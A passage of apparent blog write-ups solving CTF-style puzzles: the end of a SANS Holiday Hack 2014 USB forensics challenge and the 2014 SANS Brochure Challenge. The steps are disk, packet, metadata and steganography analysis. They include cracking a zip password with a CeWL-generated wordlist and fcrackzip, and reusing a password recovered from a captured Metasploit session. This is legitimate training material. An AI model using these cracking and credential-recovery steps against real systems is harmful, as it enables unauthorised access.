The message is between and man and woman, whose family was in debt to Scrooge, and contains a conversation in which the man was letting his wife know Scrooge is dead. She tells him the children were very happy to hear that news. This is definitely a message Scrooge wouldn’t like to see, but there’s no secret here.

The PCAP file is in .pcapng format, the next generation PCAP format, which allows comments. We can see packets in Wireshark by using the “pkt_comment” display filter:

Packet Comments

Alternatively, we can workout a single command to extract the comments in tshark using a similar filter.

$ tshark -nnr hh2014-chat.pcapng -2 -Y pkt_comment -V | grep comment -A 1 | egrep -v 'comment|--'
    VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg==
    https://code.google.com/p/f5-steganography/

The Wireshark screenshot showed two packets and the command line kung fu extracted the two comments. The first is base64 encoded. We can pipe this output to a base64 decoder and get the secret (using -D here on Mac, on Linux use -d):

$ tshark -nnr hh2014-chat.pcapng -2 -Y pkt_comment -V | grep comment -A 1 | egrep -v 'comment|--'| base64 -D
USB Secret #2: Your demise is a source of relief.

So the PCAP contained USB Secret 2. The second comment with a URL to the F5 steganography tool is a hint for another secret.

DOC – USB Secret #1

The second file on the USB drive is a document, LetterToJackFromChuck.doc. The contents of the document are the following:

Date: 25 December 2034

From: Jonathan Pease, CEO GVC

To: Charles Booth, CEO Dickensian Enterprises LTD

Subject: Merry Christmas, My Good Man

Chuck,

I am writing to wish you a most splendid holiday season, old chap. I trust you will enjoy all the trappings of the upcoming festivities: mince pies, roast pheasant, chestnut stuffing, plum pudding, &c.

Oh, and I’d be remiss if I failed to mention that Old Scratch has got his own at last. Yes, Scrooge, that despicable worm, won’t be giving us the bother any more. I can’t help but chuckle to think of all those exploits he piled up over the years being handed to each and every vendor so they can fix their wares. All’s well that ends well, I always say. Yet another reason to celebrate a most jovial Yuletide.

More importantly, please pass on my holiday tidings to Elisabeth and the children.

Tally-ho!

Your friend,

There’s an image at the top showing the company of Jonathan Pease as Generic Victorian Company and another image of his signature at the bottom. There is no secret to find in the text, but we can see that they are saying all Scrooge’s exploits he stockpiled will be handed out to vendors to patch their wares. Since nothing was found in the content of the doc, we can look at the EXIF data. I’ve removed the less interesting fields and kept the rest:

$ exiftool LetterFromJackToChuck.doc
File Name                       : LetterFromJackToChuck.doc
Author                          : Jonathan Pease
Template                        : Normal.dotm
Last Modified By                : Jonathan Pease
Software                        : Microsoft Macintosh Word
Create Date                     : 2034:12:25 14:27:00
Modify Date                     : 2034:12:25 14:31:00
Manager                         : None. I run the company!
Company                         : Generic Victorian Company
Secret                          : USB Secret #1: Your demise is a source of mirth.

So we now have USB secret #1. We can also see that the ghost took Scrooge 20 years into the future based on the Create and Modify dates, which match the date in the body of the letter. The “Generic Victorian Company” also fits in with the Dickens theme.

Hidden Files

We only saw two files on the system, but it’s possible there are other files that are hidden. We can run the Sleuth Kit tool fls to look for any deleted or hidden files.

# fls -f ntfs -r hhusb.dd.bin 
r/r 4-128-4:	$AttrDef
r/r 8-128-2:	$BadClus
r/r 8-128-1:	$BadClus:$Bad
r/r 6-128-4:	$Bitmap
r/r 7-128-1:	$Boot
d/d 11-144-4:	$Extend
+ r/r 25-144-2:	$ObjId:$O
+ r/r 24-144-3:	$Quota:$O
+ r/r 24-144-2:	$Quota:$Q
+ r/r 26-144-2:	$Reparse:$R
+ d/d 27-144-2:	$RmMetadata
++ r/r 28-128-4:	$Repair
++ r/r 28-128-2:	$Repair:$Config
++ d/d 30-144-2:	$Txf
++ d/d 29-144-2:	$TxfLog
+++ r/r 31-128-2:	$Tops
+++ r/r 31-128-4:	$Tops:$T
r/r 2-128-1:	$LogFile
r/r 0-128-1:	$MFT
r/r 1-128-1:	$MFTMirr
r/r 9-128-8:	$Secure:$SDS
r/r 9-144-6:	$Secure:$SDH
r/r 9-144-5:	$Secure:$SII
r/r 10-128-1:	$UpCase
r/r 3-128-3:	$Volume
r/r 32-128-1:	hh2014-chat.pcapng
r/r 32-128-5:	hh2014-chat.pcapng:Bed_Curtains.zip
r/r 33-128-1:	LetterFromJackToChuck.doc
-/r * 34-128-1:	Tiny_Tom_Crutches_Final.jpg
d/d 256:	$OrphanFiles

Most of the files start with a $ and are NTFS system files, but the output contains two interesting lines:

  • r/r 32-128-5: hh2014-chat.pcapng:Bed_Curtains.zip
  • -/r * 34-128-1: Tiny_Tom_Crutches_Final.jpg

The first file Bed_Curtains.zip is in an Alternate Data Stream in the hh2014-chat.pcapng file. The second file Tiny_Tom_Crutches_Final.jpg is a recently deleted file whose MFT record hasn’t been overwritten yet.

We can extract the files with another Sleuth Kit tool icat:

# icat -f ntfs hhusb.dd.bin 32-128-5 > Bed_Curtains.zip 
# file Bed_Curtains.zip 
Bed_Curtains.zip: Zip archive data, at least v2.0 to extract

# icat -f ntfs hhusb.dd.bin 34-128-1 > Tiny_Tom_Crutches_Final.jpg 
# file Tiny_Tom_Crutches_Final.jpg 
Tiny_Tom_Crutches_Final.jpg: JPEG image data, JFIF standard 1.00, comment: "JPEG Encoder Copyright 1998, James R. Weeks and BioElectroMech\261"

ZIP – USB Secret #3

We can try unzipping the file; however, it’s password protected:

# unzip Bed_Curtains.zip 
Archive:  Bed_Curtains.zip
[Bed_Curtains.zip] Bed_Curtains.png password:

We need to crack the password. The Ghost of Hacking Present gave a hint about wanting to show Scrooge something “CeWL.” CeWL is a custom wordlist generator. You can point CeWL at a website and it will create a wordlist file, so we can use CeWL against Scrooge’s website.

# ruby cewl.rb http://scrooge-and-marley.com/ > scrooge-wordlist.txt
# wc scrooge-wordlist.txt 
 4243  4243 18969 scrooge-wordlist.txt

Now that we have a wordlist, we can use fcrackzip to try the passwords in the wordlist against the zip file:

# fcrackzip -v -D -u -p scrooge-wordlist.txt Bed_Curtains.zip 
found file 'Bed_Curtains.png', (size cp/uc 1429113/1434946, flags 9, chk 4d1a)


PASSWORD FOUND!!!!: pw == shambolic
# unzip Bed_Curtains.zip 
Archive:  Bed_Curtains.zip
[Bed_Curtains.zip] Bed_Curtains.png password: 
  inflating: Bed_Curtains.png     

The successful password was used by ELIZA in the first challenge as mentioned earlier and CeWL found it in a comment in the source code of Scrooge’s site as follows:

	/* shambolic CSS, natch */

The PNG image looks like the following:

Bed_Curtains

The image is a page from A Christmas Carol of a scene where a woman is describing how she took the bed curtains and blankets from the dead body of Scrooge. No secrets are in the image, but we can look at the EXIF data and obtain the secret, another one talking about Scrooge’s demise, and again with a date in the future.

$ exiftool Bed_Curtains.png
File Name                       : Bed_Curtains.png
Comment                         : USB Secret #3: Your demise is a source of gain for others.
Modify Date                     : 2034:12:25 13:30:00

JPG – USB Secret #4

The deleted JPG image is the following:

Tiny_Tom_Crutches_Final

Looking around the image, there are no hidden secrets and nothing in the EXIF data. Since we have an image, we can try running stegdetect to look for any steganography, which would allow hiding data inside an image.

# stegdetect Tiny_Tom_Crutches_Final.jpg 
Tiny_Tom_Crutches_Final.jpg : f5(***)

Stegdetect tells us f5, which we can combine with the other comment from the PCAP giving us a URL to https://code.google.com/p/f5-steganography/. F5 is a Java steganograhpy tool.

# java -jar f5.jar x -e Tiny.txt Tiny_Tom_Crutches_Final.jpg
Huffman decoding starts
Permutation starts
423168 indices shuffled
Extraction starts
Length of embedded file: 116 bytes
(1, 127, 7) code used

# ls -l Tiny.txt 
-rw-rw-r-- 1 sieve sieve 116 Jan  4 19:51 Tiny.txt

# cat Tiny.txt 
Tiny Tom has died.

USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.

This gives us the final USB secret #4, and we’re done with the challenge. And just like in A Christmas Carol, Scrooge in our story is surely shaken by the news of Tiny Tom’s death.

Back to top

Stave 5

The spirits were successful and Scrooge has changed his ways. He finds a boy on the street to buy a furnace and deliver it to his Secret Room for Tom and Lynn. Scrooge visits his nephew for Christmas dinner and they make hacking plans for good. Also, Tiny Tom does not die, which I’m sure Tom Hessman is happy about!

Back to top

by

2014 SANS Brochure Challenge

No comments yet

Categories: Challenges

In July, SANS announced the 2014 SANS Brochure Challenge. Over the course of 4 SANS event brochures, there would be hidden messages and codes and solving each one would lead to a series of other challenges. I spent a couple hours on them and was able to work my way through everything. It was a fun challenge and there were a few interesting elements (see the QR code embedded in an audio file). Here’s my write up.

There were 4 brochures shipped in July and August that were the starting points for each of the challenges. The name will take you to my write up for that brochure and the link goes to the PDF of the brochure. The Network Security brochure has the full introduction to the challenge, but the first piece of the challenge is really in the Albuquerque challenge, so I’ll start there.

SANS Albuquerque

Page 6 of the PDF (page 4 on the brochure) has a small banner on the left side with the following text:

SANS_base64

The equals signs are usually a giveaway for Base64 encoding, and sure enough we can decode this.

$ echo aHR0cDovL2JpdC5seS8xbHA5MEx6Cg== | base64 -D
http://bit.ly/1lp90Lz

This link redirects to http://brochure2014.counterhack.com/Challenge-1-Level-1-2F381761-B9C1-424F-AD21-51C19E1D5688/.

This page has the following text:

Great work! You are a master of MIME encodings.

The challenge is just starting, though, and resistance is futile. You’ll need to prove your assimilation of knowledge before you can proceed.

Which three annual SANS conferences have the most classes being taught? Remove the year and spaces from the conference titles, order the conferences from east to west, then add the three conferences to the end of http://bit.ly/SANS_ to generate the next URL. The answer is the same whether you search for training globally or just in North America.

For example, if the three conferences were SANS Rocky Mountain 2014, SANS Security West 2014, and SANS Virginia Beach 2014, the correct URL would be http://bit.ly/SANS_SANSVirginiaBeachSANSRockyMountainSANSSecurityWest.

The list of SANS conferences is at https://www.sans.org/security-training/by-location/north-america. By looking at the number of classes at each event, we can put together the list. The conferences are SANS FIRE, SANS (in Orlando), and SANS Network Security, which gives the link http://bit.ly/SANS_SANSFIRESANSSANSNetworkSecurity which redirects to http://brochure2014.counterhack.com/Challenge-1-Level-2-A6C853E7-945C-4DEF-ADAD-B1F0D8D619CC/.

This page has the following text:

Fascinating. You have an efficient intellect.

You’ve proven your knowledge of SANS lore. You have a continuing mission, though – starting with the below question.

Alice has sent Bob an encrypted file. Find it, decrypt it, and follow the URL inside.

Download this file to answer the question.

The file at the link is a PCAP file.

Opening the file in Wireshark, there are a few interesting streams:

Applying a filter of “tcp.stream eq 20” contains the following in a POST request:

SANS_20_post

Take the content of the POST

s=75d28bf1d1cc1a104334494b15f1a20f&c=PRIVMSG%20%23memory-alpha%20%3ASheesh%2C%20I%20like%20this%20page%20more%20than%20I%20should.%20Bones’%20quotes%20are%20especially%20great%3A%20http%3A%2F%2Fmovies.yahoo.com%2Fblogs%2Fmovie-talk%2Ffascinating-star-trek-quotes-gallery-most-misquoted-line-014308748.html

And paste it into the URL Encoded box on http://www.asciitohex.com then click convert. The Text section at the top will now have:

s=75d28bf1d1cc1a104334494b15f1a20f&c=PRIVMSG #memory-alpha :Sheesh, I like this page more than I should. Bones’ quotes are especially great: http://movies.yahoo.com/blogs/movie-talk/fascinating-star-trek-quotes-gallery-most-misquoted-line-014308748.html

That URL will not be needed now, but we’ll take note of it for later.

The filter “tcp.stream eq 28” has another interesting POST we can decode in the same way:

SANS_28_post

s=75d28bf1d1cc1a104334494b15f1a20f&c=PRIVMSG #memory-alpha :Oh, that reminds me. I’ve gotta send Bob that file. I’ll encrypt it so Eve won’t take a look this time, though.

Then, tcp.stream eq 29 contains an SMB file transfer. By using “File | Export Objects | SMB/SMB2” in Wireshark, we can export “for_bob.7z”:

SANS_for_bob

As indicated in the IRC message, this file is encrypted so we need the password.

Using the filter “tcp.stream eq 35”, we see a short metasploit session:

SANS_wce

Unfortunately, these passwords won’t unzip the for_bob.7z file, but again we can save this information for later. Instead, if we return to the Yahoo page containing the Star Trek quotes and look for ones by Bones, we’ll find that the password is “Space is disease and danger wrapped in darkness and silence.” (without the quotes).

Extracting the zip with that password reveals a supersecret.txt with the following:

Bob,

I’ve encrypted this message so Eve can’t intercept it. I can’t believe she’s *still* listening in on our conversations. We’ve been talking for what, thirty-five years? More?

Anyway, here’s the link I promised: http://bit.ly/1hhVjGP

– Alice

P.S.
As for our normal conversations, here’s my favorite cat video: http://www.youtube.com/watch?v=Of2HU3LGdbo

The bit.ly link goes to http://brochure2014.counterhack.com/Challenge-1-Level-3-B9157BE3-2D0E-4674-9483-4D23F194270E/ which has the text:

Congratulations, you’ve graduated from Starfleet Academy! Before you make Captain, though, you’ll need to solve other challenges to unlock the final piece of this puzzle.

Remember what comes first as you proceed, though: “Mister Donut Always Delivers Muffins”. Download here.

“Download here” is a link to http://brochure2014.counterhack.com/Challenge-1-Level-3-B9157BE3-2D0E-4674-9483-4D23F194270E/file1.

The hint reads “Mister Donut Always Delivers Muffins”. The first letter of each word makes an acronym MDADM and, with a simple search, we can determine it refers to mdadm, a Linux software RAID utility. We have file1 now, and we will need the other image files to complete the RAID. Each challenge will end with a different file, so we’ll have 4 files in total.

Back to top

SANS Baltimore

Page 7 of the PDF (page 5 on the brochure) has the brochure challenge banner in this issue with the following Morse Code:

SANS_morse

This translates to

BITSTOPLYSLASH1JZLD0N

or

bit.ly/1JZLD0N

This redirects to http://brochure2014.counterhack.com/Challenge-2-Level-1-98ED8090-21D0-4C4D-BC23-4130CBC70878/.

Which has the following text:

The Force is strong with our family of SANS instructors. Extract the following intel from instructors’ presentations.

Be warned, though. Some of these items are as elusive as womp rats.

  1. Out of the three highlighted prefetch entries in Alissa Torres’ presentation from DFIR Summit 2012, what corresponding executable is not included in default Windows installations? (Answer in all lowercase)
  2. Examine the “Integrating Mobile and Network Attacks for In-Depth Pwnage” presentation by Ed Skoudis and Josh Wright. According to Alan Paller, what don’t we have enough of? (Answer in all lowercase)
  3. What is the username whose token Bryce Galbraith impersonates in his Seattle 2013 presentation? (just the username, no domain)

Add the three answers to http://bit.ly/SANS_ (without spaces, all lowercase) in order to reveal the next challenge.

Alissa’s presentation is at http://digital-forensics.sans.org/summit-archives/2012/why-not-to-stay-in-your-lane-as-a-digital-forensic-examiner.pdf. Page 6 contains a list of prefetch files and the non-default Windows application is strings.exe.

SANS_strings

Ed and Josh’s presentation is at https://blogs.sans.org/pen-testing/files/2014/01/561-webcast.pdf. Slide 24 contains the quote from Alan Paller with the answer being pilots.

SANS_pilots

Finally, Bryce’s presentation is at http://www.slideshare.net/brycegalbraith/why-are-our-defenses-failing-one-click-is-all-it-takes. Slide 31 shows a meterpreter session where he impersonates the token of nickburns.

SANS_nickburns

This gives us bit.ly/SANS_stringspilotsnickburns and redirects to http://brochure2014.counterhack.com/Challenge-2-Level-2-96925C5F-B1F4-4940-B704-BC2E8CBC6800/.

Which has the following text:

Done well you have!

You’ve successfully decoded the encoded text and found this site. In the words of Count Dooku, though… this is just the beginning. Answer the below question and continue on, young Padawan.

Carol has used Firefox for Android to search for, browse, and save a particular image. A compressed copy of her /data/data/org.mozilla.firefox folder is downloadable here. What is the serial number of the lens used to take the downloaded picture? Add the full serial number to the end of http://bit.ly/SANS_ to progress forward.

Hint: You may have to use resources outside the org.mozilla.firefox folder to fully answer this question.

Unzipping the Firefox data from the download link, in org.mozilla.firefox/files/mozilla/9tnld04f.default, we can look at the history:

$ tar -zxf org.mozilla.firefox.tgz
$ cd org.mozilla.firefox/files/mozilla/9tnld04f.default/
$ sqlite3 browser.db
SQLite version 3.7.13 2012-07-17 17:46:21
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select * from history;
1|harrison ford han solo comic con - Google Search|https://www.google.com/search?q=harrison+ford+han+solo+comic+con&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official|1|4|1392762220192|1392762220193|1392762220388|MD-yXAaFyT8n|0
2|harrison ford han solo comic con - Google Search|https://www.google.com/images?q=harrison+ford+han+solo+comic+con&oe=utf-8&rls=org.mozilla%3Aen-US%3Aofficial&hl=en&sa=X&oi=image_result_group&ei=bN0DU62oA9LaoATH24LgBg&ved=0CAsQsAQ|1||1392762223983|1392762223989|1392762224105|sSslhqzIDbYl|0
3|harrison ford han solo comic con - Google Search|https://www.google.com/images?q=harrison+ford+han+solo+comic+con&oe=utf-8&rls=org.mozilla%3Aen-US%3Aofficial&hl=en&sa=X&oi=image_result_group&ei=bN0DU62oA9LaoATH24LgBg&ved=0CAsQsAQ#|1||1392762224970|1392762224971|1392762224996|VPqjDulKQtRk|0
4|harrison ford han solo comic con - Google Search|https://www.google.com/images?q=harrison+ford+han+solo+comic+con&rls=org.mozilla:en-US:official&hl=en&tbm=isch&ei=b90DU4rZLdfloASKvIGYCQ&start=20&sa=N|1||1392762232161|1392762232163|1392762232252|0NJPgjqylSKg|0
5|harrison ford han solo comic con - Google Search|https://www.google.com/images?q=harrison+ford+han+solo+comic+con&rls=org.mozilla:en-US:official&hl=en&tbm=isch&ei=b90DU4rZLdfloASKvIGYCQ&start=20&sa=N#|1||1392762232803|1392762232804|1392762232814|T4thX7ACWW_o|0
6|harrison ford han solo comic con - Google Search|https://www.google.com/images?q=harrison+ford+han+solo+comic+con&rls=org.mozilla:en-US:official&hl=en&tbm=isch&ei=b90DU4rZLdfloASKvIGYCQ&start=20&sa=N#i=8|1||1392762236646|1392762236651|1392762236659|mJ_g8jlQDXq2|0
7|173974131.jpg (JPEG Image, 1000 × 758 pixels)|http://cbssanfran.files.wordpress.com/2013/07/173974131.jpg?w=1000|1|5|1392762243050|1392762243051|1392762243541|BHlaG0nvvlzS|0

This shows a Google search for “harrison ford han solo comic con” and, finally in row 7, downloading an image 173974131.jpg from a wordpress site.

$ sqlite3 downloads.sqlite
SQLite version 3.7.13 2012-07-17 17:46:21
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select * from moz_downloads;
1|173974131.jpg|http://cbssanfran.files.wordpress.com/2013/07/173974131.jpg?w=1000|file:///storage/emulated/0/Download/173974131.jpg||1392762252466744|1392762252537026|1|http://cbssanfran.files.wordpress.com/2013/07/173974131.jpg?w=1000||333764|333764|||0|0|abwrZ5us7Wr2

The download history indicates a JPG file was downloaded, so we should be able to find it in the Firefox cache. From org.mozilla.firefox/files/mozilla/9tnld04f.default/Cache, run this:

$ find . -type f -exec file {} \; | grep JPEG
./0/0A/52437d01: JPEG image data, JFIF standard 1.01

Now we can run exiftool on that file, but there is no information on the lens.

$ exiftool 0/0A/52437d01  | grep Lens

Instead, download the file from http://cbssanfran.files.wordpress.com/2013/07/173974131.jpg?w=1000

"Ender's Game" Press Conference

Then, run exiftool:

$ exiftool 173974131.jpg | grep Lens
Lens Info : 70-200mm f/0
Lens Model : EF70-200mm f/2.8L IS II USM
Lens Serial Number : 0000c15998

This gives us the URL http://bit.ly/SANS_0000c15998 which redirects to http://brochure2014.counterhack.com/Challenge-2-Level-3-63A2BD6A-0A72-4F84-9949-587E7AB7254A/ and has the following text:

Do you remember that scene from Episode IV, where Luke and Han get Medals of Bravery from Princess Leia? Well, you deserve one too!

Unfortunately, just like Chewbacca, you’re not going to get one. You can download this file, though, along with some others, to get your own reward!

Download here.

P.S. No, the comic book doesn’t count. You’re really not getting a Medal of Bravery. Sorry ’bout that!

The link is for file2, the second file in the mdadm RAID, and this ends the challenge for this brochure.

Back to top

SANS Seattle

Page 6 of the PDF (page 4 on the brochure) has the brochure challenge banner in this issue with the following symbols:

SANS_symbols

I cut out one of the images:

symbol

Then searched at Google’s Search by Image at http://www.google.com/insidesearch/features/images/searchbyimage.html, which revealed some images related to Futurama:

Search Results

In particular, I found the Pilot Eye Chart in the results.

planet-express-eye-chart

These symbols are part of the Futurama alien language. This page on Alienese shows an image mapping letters to the symbols:

http://futurama.wikia.com/wiki/Alienese

SANS_alienesemap

Mapping the letters from the brochure gives BITDOTLYSLASH1DR4FZG or bit.ly/1DR4FZG which redirects to http://brochure2014.counterhack.com/Challenge-3-Level-1-6A20856D-F322-4CA7-95AC-66FEC65A2546/ and has the following text:

Good news, everyone!

You weren’t fooled by Alienese, were you? Well, before you can become the most important person in the universe, you have some more challenges to finish.

  1. What is the last name of the winner of the second annual NetWars Tournament of Champions?
  2. What is the only tool to be listed on both the “Mobile Device” and “Web App” sections of the SANS Ultimate Pen Test Poster?
  3. How many cans of Red Bull are visible in Dr. Cole’s champagne bucket picture from #SANSScottdale 2014? Be sure to spell out the number (i.e., use “Six” instead of “6”).

Add the three answers to http://bit.ly/SANS_ (without spaces, but keeping the original capitalization) in order to reveal the next section.

The last name of the winner of NetWars can be found at
https://www.sans.org/press/sans-announces-winner-second-annual-netwars-tournament-of-champions.php. His name is Matthew Toussain (0sm0s1z).

The poster can be found at http://pen-testing.sans.org/blog/pen-testing/2013/06/20/announcing-the-ultimate-sans-pen-test-poster. The only tool listed in both “Mobile Device” and “Web App” sections of the poster is Burp Suite.

Dr. Cole’s twitter image can be found at https://twitter.com/drericcole/status/436515767152947200/photo/1. There are Four Red Bull cans visible.

Combining these answers gives us https://bit.ly/SANS_ToussainBurpSuiteFour which redirects to http://brochure2014.counterhack.com/Challenge-3-Level-2-46EE0A03-B770-4B4A-B69A-2651DB1E1BF9/ and has the following text:

Obligatory Zapp Brannigan quote: “If you can hit the bulls-eye, the rest of the dominoes will fall like a house of cards. Checkmate.”

Dave messed up a tar command and deleted a WAV file on accident. He’d really appreciate it if you could retrieve it for him – here’s a download that might help.

Once you’ve recovered the audio file, look at it carefully to find the next URL.

The link is http://brochure2014.counterhack.com/Challenge-3-Level-2-46EE0A03-B770-4B4A-B69A-2651DB1E1BF9/repo.svn_dump.gz. Download the file and gunzip it. The file appears to be an SVN repo. I tried restoring the repo, but I don’t have much SVN experience and kept getting errors. After getting frustrated with that for a while, I just decided to locate the file manually and dump it.

First, I looked at what files were in the repo:

$ grep -a Node-path repo.svn_dump
Node-path: .bash_logout
Node-path: .bashrc
Node-path: .profile
Node-path: examples.desktop
Node-path: dontopen.mp3
Node-path: dontopen.mp3
Node-path: goals.txt

There wasn’t a WAV file, but there was an MP3, so I assumed that was the target. There’s some useful information around the two instances of “dontopen.mp3” in the repo:

$ grep -a dontopen -C 5 repo.svn_dump
svn:log
V 21
Added additional file
PROPS-END

Node-path: dontopen.mp3
Node-kind: file
Node-action: add
Prop-content-length: 59
Text-content-length: 492355
Text-content-md5: 33fa9536b5174d00005850332f8ec8d3
--
--
svn:log
V 70
Oops! Cleared a file that shouldn't have been there in the first place
PROPS-END

Node-path: dontopen.mp3
Node-action: delete


Revision-number: 4
Prop-content-length: 114

We see a message that the file was deleted and shouldn’t have been there. We also have the length of the target file and its MD5 which will help with extracting and verifying it. We just need to know the starting position of the file data. The grep matches above are in a properties section for the file. The full content of the properties section is:

Node-path: dontopen.mp3
Node-kind: file
Node-action: add
Prop-content-length: 59
Text-content-length: 492355
Text-content-md5: 33fa9536b5174d00005850332f8ec8d3
Text-content-sha1: fea00644b3454ee685c91be450183f5ccb5d7406
Content-length: 492414

K 13
svn:mime-type
V 24
application/octet-stream
PROPS-END
ÿûÐÄ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@Info^@^@^@^O^@^@^BL^@^G<83>C^@^B^E^G

We can see the properties ends with a PROPS-END and is immediately followed by the file data, so we just need the offset immediately following PROPS_END.

$ xxd repo.svn_dump | grep -C 3 END
...snip...
--
0003be0: 0a0a 4b20 3133 0a73 766e 3a6d 696d 652d  ..K 13.svn:mime-
0003bf0: 7479 7065 0a56 2032 340a 6170 706c 6963  type.V 24.applic
0003c00: 6174 696f 6e2f 6f63 7465 742d 7374 7265  ation/octet-stre
0003c10: 616d 0a50 524f 5053 2d45 4e44 0aff fbd0  am.PROPS-END....
0003c20: c400 0000 0000 0000 0000 0000 0000 0000  ................
0003c30: 0000 496e 666f 0000 000f 0000 024c 0007  ..Info.......L..
0003c40: 8343 0002 0507 0a0d 0f12 1417 1a1c 1f21  .C.............!
--
...snip...

This hexdump and grep shows the PROPS-END preceded by “application/octet-stream” and followed by binary data, so this looks like the right offset. PROPS-END is followed by hex character 0x0A, which is the newline character, so the start of the data we want is the 0xFF at offset 0x3C1D, or decimal 15389.

Extract the mp3 with:

$ dd if=repo.svn_dump skip=15389 bs=1 count=492355 of=dontopen.mp3
$ md5 dontopen.mp3
MD5 (dontopen.mp3) = 33fa9536b5174d00005850332f8ec8d3

The MD5 of the extracted file matches the MD5 is the properties data from the SVN repo, so it looks like we have the right file. Open in Audacity and select the Spectrogram.

SANS_spectrogram

Scroll to the right and we see what looks like a QR code.

SANS_QRcoderaw

I tried scanning this with a QR code reader, but it wouldn’t work, so I rebuilt the QR code in Excel. After zooming in on the spectrogram, it took a few minutes, but it wasn’t too hard to figure out what needed to be black vs. white.

SANS_QRCodezoom

SANS_QRcodexls

Scanning the Excel image with a QR code reader opens http://bit.ly/1lmqWnz which redirects to
http://brochure2014.counterhack.com/Challenge-3-Level-3-70A90642-FFBF-476B-83DD-48DE266C9B51/ which has the following text:

Did you go back in time and give yourself the answer? Well, either way, great work!

Download the following file and use it, along with others, to reveal the final answer.

Download here.

This will download file3, the third of the 4 files we need, and ends the challenge for this brochure.

Back to top

SANS Network Security

Page 6 of the PDF (page 2 on the brochure) introduces the brochure challenge. For this brochure, the challenge is to find all the diamond shapes with a number in them and assemble them. The shapes look like this:

SANSdiamond

Finding all the images will give you the following (PDF page numbers, subtract 4 to get the printed page number):

  • 98 – page 6
  • 105 – page 9
  • 116 – page 12
  • 46 – page 19
  • 108 – page 25
  • 121 – page 33
  • 47 – page 35
  • 80 – page 40
  • 55 – page 46
  • 77 – page 49
  • 108 – page 61
  • 70 – page 65
  • 70 – page 82

These look like decimal values of ASCII so if we convert each number to its corresponding letter (98=b, 105=i, etc.) we get bit.ly/P7MlFF. This redirects to http://brochure2014.counterhack.com/Challenge-4-Level-1-756D0EF9-2285-4D68-BFE4-C24BE0A003BD/.

This page has the following text:

Good work, recruit. Welcome aboard the Battlestar Galactica. Your next mission is to prove your knowledge of SANS lore.

  1. What software did John Strand run during a recorded call with online scammers to scare and confuse them?
  2. What software does Lenny Zeltser have a YouTube video of running in order to create a memory capture?

Add the two answers to http://bit.ly/SANS_ (without spaces, with the original capitalization) in order to reveal the next section.

Turning to Google we can find the answers to these questions:

  1. The video of John Strand is at https://www.youtube.com/watch?v=6ftRs73dx4s. In the video, he uses Poison Ivy.
  2. The video from Lenny Zeltser is at https://www.youtube.com/watch?v=SEs4ZAolED0. In the video, he uses DumpIt.

These two answers give us the next link: http://bit.ly/SANS_PoisonIvyDumpIt which redirects to http://brochure2014.counterhack.com/Challenge-4-Level-2-6936232A-C867-4CFD-9893-36923470871B/

This page has the following text:

Congratulations! You’ve done very well.

Yes, you’re tired. Yes, there is no relief. Yes, the questions keep coming after you time after time after time. And yes, you are still expected to persist!

Eve suspects that one of the other characters might not be as innocent as they claim to be. She’ll need your help to prove it, however. Examine the other three questions from Level 2 and the included files. Which user, based off their malicious behavior, might be a Cylon?

Once you know who it is, find their password and add it to the end of http://bit.ly/SANS_232E28B95F01_ to continue this quest.

So say we all!

From the PCAP in the Albuquerque challenge, the metasploit session did prove helpful with the password for alice\BOB, which was iamnumbersix. Putting this into the link gives http://bit.ly/SANS_232E28B95F01_iamnumbersix, which redirects to http://brochure2014.counterhack.com/Challenge-4-Level-3-E071FCF5-1876-462B-BC0F-1C6648DB41D4/ and has the following text:

You’ve uncovered the Cylon and completed this part of the challenge. Before your promotion, though, you’ll need to answer other questions.

Download the below file, in combination with other parts, to complete the entire challenge.

Download here.

“Download here” links to the final file, file4, and is the end of this challenge. The link of the word “file” is to the Linux man page for the file command. Running this on the 4 downloaded files seemed like it might have been a hint, but I didn’t get any additional information:

$ file file*
file1: data
file2: data
file3: data
file4: data

Back to top

Putting It All Together

The file command didn’t help with identifying the files, but the original hint to use mdadm proves to be correct. We can run the following commands to setup and mount the software RAID with mdadm. The first four commands create loopback devices for the 4 separate files. The mdadm command combines the 4 devices into a single device. Finally, the mount command mounts the device at the mountpoint /mnt.

$ sudo losetup /dev/loop0 file1
$ sudo losetup /dev/loop1 file2
$ sudo losetup /dev/loop2 file3
$ sudo losetup /dev/loop3 file4
$ sudo mdadm --assemble /dev/md0 /dev/loop0 /dev/loop1 /dev/loop2 /dev/loop3
mdadm: /dev/md0 has been started with 4 drives.
$ sudo mount /dev/md0 /mnt
$ ls /mnt
lost+found  README.txt  winner.7z

Looking in /mnt, we can see a README.txt file:

Congratulations, dear challenger. You have proven your knowledge of encodings, SANS lore, technology, and assorted geekery.

The passphrase for the encrypted 7-zip file is: “How about a nice game of chess?”

The other file in /mnt is the referenced winner.7z. Using that password on winner.7z extracts a few bonus pictures, a file called randombits to make sure the 7z file was big enough to span all the device files, and a final text file “how to win.txt”.

$ 7za x -p"How about a nice game of chess?" winner.7z 

7-Zip (A) [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,1 CPU)

Processing archive: winner.7z

Extracting  winning/randombits
Extracting  winning/bonus_pictures/Battlestar Galactica.jpg
Extracting  winning/bonus_pictures/Firefly.jpg
Extracting  winning/bonus_pictures/President Bush and Internet Storm Center.jpg
Extracting  winning/bonus_pictures/SANS instructors on stage.jpg
Extracting  winning/bonus_pictures/SANS trio.jpg
Extracting  winning/bonus_pictures/Futurama.png
Extracting  winning/how to win.txt
Extracting  winning/bonus_pictures
Extracting  winning

Everything is Ok

Folders: 2
Files: 8
Size:       11938981
Compressed: 12021769

The contents of “how to win.txt” are as follows:

Congratulations! You’ve bested all of our challenges… save one.

Send an email to jeff@counterhack.com with the subject line “Brochure Challenge – The Beauty of the Baud”. In the body of the email, include a brief explanation of the steps you took to solve the main technical challenges (Alice’s encrypted file for Bob, Carol’s Firefox for Android, Dave’s recovered WAV file, and the Cylon question). One paragraph each is sufficient.

I sent Jeff an email and got a response back that I was done. Again, it was a great challenge, and I look forward to the next one.

Back to top

by

Christmas 2012 Hacking Challenge

No comments yet

Categories: Challenges, Penetration Testing

